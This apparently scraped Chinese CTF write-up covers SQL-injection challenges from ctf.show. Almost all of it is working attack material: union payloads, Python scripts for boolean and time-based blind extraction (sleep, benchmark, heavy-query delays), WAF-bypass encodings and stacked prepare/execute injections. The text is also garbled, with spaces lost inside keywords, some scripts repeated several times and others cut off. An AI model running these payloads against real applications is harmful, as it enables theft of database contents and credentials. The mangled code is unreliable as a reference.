1' union all select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(group_concat(table_name),1,'numA'),2,'numB'),3,'numC'),4,'numD'),5,'numE'),6,'numF'),7,'numG'),8,'numH'),9,'numI'),'0','numJ') from information_schema.tables where table_schema=database() %23
查字段名
1
1' union all select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(group_concat(column_name),1,'numA'),2,'numB'),3,'numC'),4,'numD'),5,'numE'),6,'numF'),7,'numG'),8,'numH'),9,'numI'),'0','numJ') from information_schema.columns where table_schema=database() and table_name='ctfshow_user4' %23
查结果
1
1' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,1,'numA'),2,'numB'),3,'numC'),4,'numD'),5,'numE'),6,'numF'),7,'numG'),8,'numH'),9,'numI'),'0','numJ') from ctfshow_user4--+
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests import time url = "http://bab11107-9d31-46bf-b41e-0a04bb92b155.challenge.ctf.show:8080/api/v5.php" dict = "0123456789abcdefghijklmnopqrstuvwxyz{}-" flag ="" for i in range(1,50): for j in dict: payload= f"?id=1' and if(substr((select password from ctfshow_user5 where username=\"flag\"),{i},1)=\"{j}\",sleep(3),0)--+" res_get = url + payload start = time.time() res = requests.get(url=res_get) end = time.time() if end-start > 3: flag = flag + j print(flag) break
web176
发现是对select的过滤,但是没有过滤大小写
表
1
1' union all Select1,2,(Select table_name from information_schema.tables where table_schema=database()) --+
字段
1
1' union all Select1,2,(Selectgroup_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_user') --+
查flag
1
1' union all Select1,2,(Selectpasswordfrom ctfshow_user where username='flag') --+
url = "http://e9202b55-424f-460d-8597-692168ba560f.challenge.ctf.show:8080/select-waf.php" str = "0123456789abcdefghijklmnopqrstuvwxyz{}-" flag = "ctfshow" for i in range(0,666): print('[*] 开始盲注第{}位'.format(i)) for j in str: data = { "tableName":"(ctfshow_user)where(pass)like'{0}%'".format(flag+j) } res = requests.post(url,data) if res.text.find("$user_count = 1")>0: flag += j print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
web184
这把过滤了where,我们用右连接来做
1
ctfshow% 的十六进制 为 0x63746673686F7725
所以用他来匹配like,放出了空格
1
tableName=ctfshow_user as a right join ctfshow_user as b on b.pass like 0x63746673686F7725
defto_hex(s): #转十六进制 str_16 = binascii.b2a_hex(s.encode('utf-8')) res = bytes.decode(str_16) return res
url = "http://d42dba7c-384e-4a5d-9a5d-26398d42ce7c.challenge.ctf.show:8080/select-waf.php" str = "0123456789abcdefghijklmnopqrstuvwxyz{}-" flag = "ctfshow" for i in range(0,666): print('[*] 开始盲注第{}位'.format(i)) for j in str: result = "0x" + to_hex(flag + j + "%") data = { "tableName":"ctfshow_user as a right join ctfshow_user as b on b.pass like {0}".format(result) } res = requests.post(url,data) if"$user_count = 43"in res.text: flag += j print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
# tableName=ctfshow_user as a right join ctfshow_user as b on b.pass like 0x63746673686F7725
web185
这次直接过滤了0-9的所有数字,上个脚本进行改变
这次我们利用true来进行替换数字
1 2 3
select true+true; 结果是2 所以我们构造数字c来进行like匹配
我们还是用like模糊匹配,然后利用concat连接true形成的字符和数字
1
tableName=ctfshow_user as a right join ctfshow_user as b on b.pass like concat(char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true))
flag = "ctfshow" for i in range(0,666): print('[*] 开始盲注第{}位'.format(i)) for j in str: result = change_str(flag + j + "%") data = { "tableName":"ctfshow_user as a right join ctfshow_user as b on b.pass like (concat({}))".format(result) } res = requests.post(url,data) if"$user_count = 43"in res.text: flag += j print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
flag = "ctfshow" for i in range(0,666): print('[*] 开始盲注第{}位'.format(i)) for j in str: result = change_str(flag + j + "%") data = { "tableName":"ctfshow_user as a right join ctfshow_user as b on b.pass like (concat({}))".format(result) } res = requests.post(url,data) if"$user_count = 43"in res.text: flag += j print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
for i in range(666): print('[*] 开始盲注第{}位'.format(i)) for j in str: data={ "username":payload.format(flag + j), "password":0 } res = requests.post(url,data) ifr"\u67e5\u8be2\u5931\u8d25"in res.text: flag += j print(flag) break if j=='}': print('[*] flag is {}'.format(flag)) exit()
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests url = "http://17f404c9-b645-40ab-8daf-f60c335e2d84.challenge.ctf.show:8080/api/" str = "01234567890-=!@#$%^&*()_+`~ qwertyuiopasdfghjklzxcvbnm[];,./{}:<>?\|" flag = "" #查表 payload="admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',1,0)#" #查字段 payload="admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_fl0g'),{},1)='{}',1,0)#" payload="admin' and if(substr((select f1ag from ctfshow_fl0g),{},1)='{}',1,0)#" n=0 # admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)# for i in range(0,666): for j in str: data = { "username":payload.format(i,j), "password":123456 } res = requests.post(url,data) ifr"\u5bc6\u7801\u9519\u8bef"in res.text: flag += j n+=1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests url = "http://17f404c9-b645-40ab-8daf-f60c335e2d84.challenge.ctf.show:8080/api/" str = "01234567890-=!@#$%^&*()_+`~ qwertyuiopasdfghjklzxcvbnm[];,./{}:<>?\|" flag = "" #查表 payload="admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',1,0)#" #查字段 payload="admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_fl0g'),{},1)='{}',1,0)#" payload="admin' and if(substr((select f1ag from ctfshow_fl0g),{},1)='{}',1,0)#" n=0 # admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)# for i in range(0,666): for j in str: data = { "username":payload.format(i,j), "password":123456 } res = requests.post(url,data) ifr"\u5bc6\u7801\u9519\u8bef"in res.text: flag += j n+=1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests url = "http://8ab877db-cd5c-424f-bb9c-0f54ba6447c7.challenge.ctf.show:8080/api/" str = "01234567890-=!@#$%^&*()_+`~ qwertyuiopasdfghjklzxcvbnm[];,./{}:<>?\|" flag = "" #查表 payload="admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',1,0)#" #查字段 payload="admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_fl0g'),{},1)='{}',1,0)#" payload="admin' and if(substr((select f1ag from ctfshow_fl0g),{},1)='{}',1,0)#" n=0 # admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)# for i in range(0,666): for j in str: data = { "username":payload.format(i,j), "password":123456 } res = requests.post(url,data) if"密码错误"in res.json()['msg']: flag += j n+=1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests url = "http://131ffba2-a367-4469-8421-e4c0d9877e37.challenge.ctf.show:8080/api/" str = "01234567890qwertyuiopasdfghjklzxcvbnm{}-()_,," flag = "" #查表payload="admin' and if((select group_concat(table_name) from information_schema.tables where table_schema=database())regexp('^{}'), 1, 0)#" #查字段payload="admin' and if((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flxg')regexp('^{}'), 1, 0)#" payload="admin' and if((select group_concat(f1ag) from ctfshow_flxg)regexp('^{}'), 1, 0)#" n=0 # admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)# for i in range(0,666): for j in str: data = { "username":payload.format(flag+j), "password":123456 } res = requests.post(url,data) if"密码错误"in res.json()['msg']: flag += j n+=1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests url = "http://8f2766ad-af45-441e-b247-7a526b3d150f.challenge.ctf.show:8080/api/" str = "01234567890qwertyuiopasdfghjklzxcvbnm{}-()_,," flag = "" #查表payload="admin' and if((select group_concat(table_name) from information_schema.tables where table_schema=database())regexp('^{}'), 1, 0)#" #查字段payload="admin' and if((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flxg')regexp('^{}'), 1, 0)#" payload="admin' and if((select group_concat(f1ag) from ctfshow_flxg)regexp('^{}'), 1, 0)#" n=0 # admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)# for i in range(0,666): for j in str: data = { "username":payload.format(flag+j), "password":123456 } res = requests.post(url,data) if"密码错误"in res.json()['msg']: flag += j n+=1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
web195
1 2 3 4 5 6 7 8 9
//拼接sql语句查找指定ID用户 $sql = "select pass from ctfshow_user where username = {$username};";
from lib.core.compat import xrange from lib.core.enums import PRIORITY from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS
from lib.core.compat import xrange from lib.core.enums import PRIORITY from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS
url = "http://5eb465ee-6eeb-4508-9fea-5496e3ad2a8f.challenge.ctf.show:8080/api/" str = "01234567890qwertyuiopasdfghjklzxcvbnm{}-()_,," flag = ""
#payload = "if(substr(database(),{},1)='{}',sleep(3),0)" #payload = "if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',sleep(5),0)" #payload = "if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagx'),{},1)='{}',sleep(5),0)" payload = "if(substr((select group_concat(flaga) from ctfshow_flagx),{},1)='{}',sleep(5),0)" n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() print(end - start) if end - start > 4.9and end - start < 6.9: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
url = "http://fed15780-e37b-48e2-8e96-86d984f46b94.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = ""
#查数据库payload = "1' or if(substr(database(),{},1)='{}',sleep(3),0) #" #查表payload = "1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',sleep(3),0) #" #查字段payload = "1' or if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxc'),{},1)='{}',sleep(3),0) #" payload = "1' or if(substr((select group_concat(flagaa) from ctfshow_flagxc),{},1)='{}',sleep(3),0) #" #payload = "if(substr((select group_concat(flaga) from ctfshow_flagx),{},1)='{}',sleep(5),0)" n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() if end - start > 2.9and end - start < 4.9: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
url = "http://83e21d02-6e3a-4c01-9016-79367bdcb966.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #'MQ==' or if(1=1,sleep(5),0) #payload = "'MQ==' or if(substr(database(),{},1)='{}',sleep(5),0) " #payload = "'MQ==' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',sleep(5),0) " #payload = "'MQ==' or if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxcc'),{},1)='{}',sleep(5),0) " payload = "'MQ==' or if(substr((select group_concat(flagaac) from ctfshow_flagxcc),{},1)='{}',sleep(5),0) " n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() if end - start > 4.9and end - start < 6.9: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
web217
1 2 3 4
//屏蔽危险分子 function waf($str){ return preg_match('/sleep/i',$str); }
url = "http://fe186d5a-2385-43fd-8d4a-d557cc25b038.challenge.ctf.show:8080//api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #1 or if(substr(database(),{},1)='{}',benchmark(6666666,sha(1)),0) #payload = "1orif(substr(database(),{},1)='{}',benchmark(6666666,sha(1)),0)" #payload = "1) andif(substr((selectgroup_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',benchmark(5000000,sha(1)),0) #" #payload = "1) and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxccb'),{},1)='{}',benchmark(5000000,sha(1)),0) #" payload = "1) and if(substr((select group_concat(flagaabc) from ctfshow_flagxccb),{},1)='{}',benchmark(5000000,sha(1)),0) #"
n = 0
for i inrange(0, 666): for j instr: data = { "ip": payload.format(i,j), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() # print(end-start) ifend - start > 1.4andend - start < 4.9: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# -- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/31 # blog: gylq.gitee.io import requests import time bypass="concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'" url = "http://4f04cb91-f6ed-43ce-bc4d-539d9c5b2a7b.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',( concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),0)# #求表payload = "1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',({}),0)#" #payload = "1) and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxc'),{},1)='{}',({}),0)#" payload = "1) and if(substr((select group_concat(flagaac) from ctfshow_flagxc),{},1)='{}',({}),0)#"
n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j,bypass), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() if end - start > 0.4and end - start < 1: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
web219
1 2 3 4
//屏蔽危险分子 function waf($str){ return preg_match('/sleep|benchmark|rlike/i',$str); }
# -- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/31 # blog: gylq.gitee.io import requests import time bypass="concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) LIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'" url = "http://ea12a2f3-655e-44f2-b249-a95701399f73.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',( concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),0)# #payload = "1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',({}),0)#" #payload = "1) and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxca'),{},1)='{}',({}),0)#" payload = "1) and if(substr((select group_concat(flagaabc) from ctfshow_flagxca),{},1)='{}',({}),0)#"
n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j,bypass), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() print(end - start) if end - start > 0.22and end - start < 0.5: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break #ctfshow{92286539-ff05-4292-bcbf-7ff6fa6e31ab}
笛卡尔积(因为连接表是一个很耗时的操作) AxB=A和B中每个元素的组合所组成的集合,就是连接表 SELECTcount(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C; select * from table_name A, table_name B select * from table_name A, table_name B,table_name C selectcount(*) from table_name A, table_name B,table_name C 表可以是同一张表
# -- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/8/1 # blog: gylq.gitee.io import requests import time bypass="select count(*) from information_schema.schemata a, information_schema.tables b, information_schema.tables c, information_schema.schemata d, information_schema.schemata e" url = "http://ea12a2f3-655e-44f2-b249-a95701399f73.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',( concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),0)# #payload = "1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',({}),0)#" #payload = "1) and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxca'),{},1)='{}',({}),0)#" payload = "1) and if(substr((select group_concat(flagaabc) from ctfshow_flagxca),{},1)='{}',({}),0)#"
n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j,bypass), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() print(end - start) if end - start > 1.5and end - start < 5: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break #ctfshow{92286539-ff05-4292-bcbf-7ff6fa6e31ab}
# -- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/8/1 # blog: gylq.gitee.io import requests import time bypass="select count(*) from information_schema.schemata a, information_schema.tables b, information_schema.tables c, information_schema.schemata d, information_schema.schemata e, information_schema.schemata f" url = "http://d82b1a0b-aba4-4fed-aa83-62d59d7df4ee.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #1) and if((database())regexp('^ctfshow'),(select count(*) from information_schema.schemata a, information_schema.tables b, information_schema.tables c, information_schema.schemata d, information_schema.schemata e, information_schema.schemata f),0)# #payload = "1) and if((database())regexp('^{}'),({}),0)#" #payload = "1) and if((select table_name from information_schema.tables where table_schema=database() limit 0,1)regexp('^{}'),({}),0)#" #payload = "1) and if((select column_name from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxcac' limit 1,1)regexp('^{}'),({}),0)#" payload = "1) and if((select flagaabcc from ctfshow_flagxcac limit 0,1)regexp('^{}'),({}),0)#"
n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(flag + j,bypass), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() if end - start > 3and end - start < 5: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
flag = "" #------------------------------------------------------------------------------------------------------------------------------------------------------------- #查表 # sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #查字段 # sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flaga'" #查flag sql= "select flagaabc from ctfshow_flaga" #------------------------------------------------------------------------------------------------------------------------------------------------------------- payload = "concat(if(substr(({}),{},1)='{}',sleep(0.10),0),1)"
#concat(if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',sleep(0.10),0),1)
n = 0
for i in range(0, 666): for j in str: params = { 'u' : payload.format(sql,i,j) }
start = time.time() res = requests.get(url = url, params = params) end = time.time() if end - start > 2and end - start < 3: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
defgenerateNum(num): res = 'true' if num == 1: return res else: for i in range(num-1): res += "+true" return res
url = "http://ce009cf2-8652-4737-ba07-b3bfc3bc3a4a.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = ""
#************************************************************************************************************************************************************* #--------查表 #sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagas'" #--------查flag sql= "select flagasabc from ctfshow_flagas" #************************************************************************************************************************************************************* payload = "if(ascii(substr(({}),{},true))=({}),username,false)"
#计数 n = 0
for i in range(1, 666): for j in range(32,126): result_num=generateNum(i) result=generateNum(j) params = { 'u' : payload.format(sql,result_num,result) }
res = requests.get(url = url, params = params) if"userAUTO"in res.text: flag += chr(j) n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break #ctfshow{728dd1b0-7547-401d-b358-2d2207f3d13c}
SET @tn = 'hahaha'; //存储表名 SET @sql = concat('select * from ', @tn); //存储SQL语句 PREPAREnamefrom @sql; //预定义SQL语句 EXECUTEname; //执行预定义SQL语句 (DEALLOCATE || DROP) PREPARE sqla; //删除预定义SQL语句
因为concat连接之后直接就是字符串,所以就直接构造payload
1
http://76114b3b-7ffd-4016-8b00-b96feb693fd8.challenge.ctf.show:8080/api/?username=ctfshow';show tables;prepare gylq from concat('s','elect',' * from ctfshow_flagasa');execute gylq;--+
web226
预处理from后面可以跟十六进制,所以可以有更骚的姿势,直接将select * from ctfsh_ow_flagas转换成0x73656C656374202A2066726F6D2063746673685F6F775F666C61676173就可以直接语句执行
payload
1
http://bbec116e-8f61-487c-8966-9384be4efe14.challenge.ctf.show:8080/api/?username=userAUTO';prepare gylq from 0x73656C656374202A2066726F6D2063746673685F6F775F666C61676173;execute gylq--+
http://faa7806b-aae1-4405-8c64-1600655bcd26.challenge.ctf.show:8080/api/?username=user1';prepare gylq from 0x73656C656374202A2066726F6D20696E666F726D6174696F6E5F736368656D612E726F7574696E6573;execute gylq;
http://abd0d622-b6b8-48c7-98f3-9a49f3996b1b.challenge.ctf.show:8080/api/?username=user1';prepare gylq from 0x73656C656374202A2066726F6D2063746673685F6F775F666C616761736161;execute gylq;
web229
和上题一样,估计没招了
1
http://74ea40ed-fc20-471c-8d2e-05cbd44aadad.challenge.ctf.show:8080/api/?username=user1';prepare gylq from 0x73656C656374202A2066726F6D20666C6167;execute gylq;
web230
堆叠注入的精髓就是预处理和转十六进制么,和上题一样
1
http://bde7f4f9-1def-42cf-afee-da3025b6550a.challenge.ctf.show:8080/api/?username=user1';prepare gylq from 0x73656C656374202A2066726F6D20666C61676161626278;execute gylq;
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
url = "http://06b28180-71ea-4f89-a05a-7d6baaf18696.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #password=1234567811&username=ctfshow' and if(substr(database(),1,1)='c',1,0)# #************************************************************************************************************************************************************* #--------查表 #sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flaga'" #--------查flag sql= "select group_concat(flagas) from flaga" #************************************************************************************************************************************************************* payload = "ctfshow' and if(substr(({}),{},1)='{}',1,0)#"
#计数 n = 0
for i in range(1, 666): for j in str: params = { 'username' : payload.format(sql,i,j), 'password' : "{}".format(i) } res = requests.post(url = url, data = params) #print(res.text) ifr"\u66f4\u65b0\u6210\u529f"in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
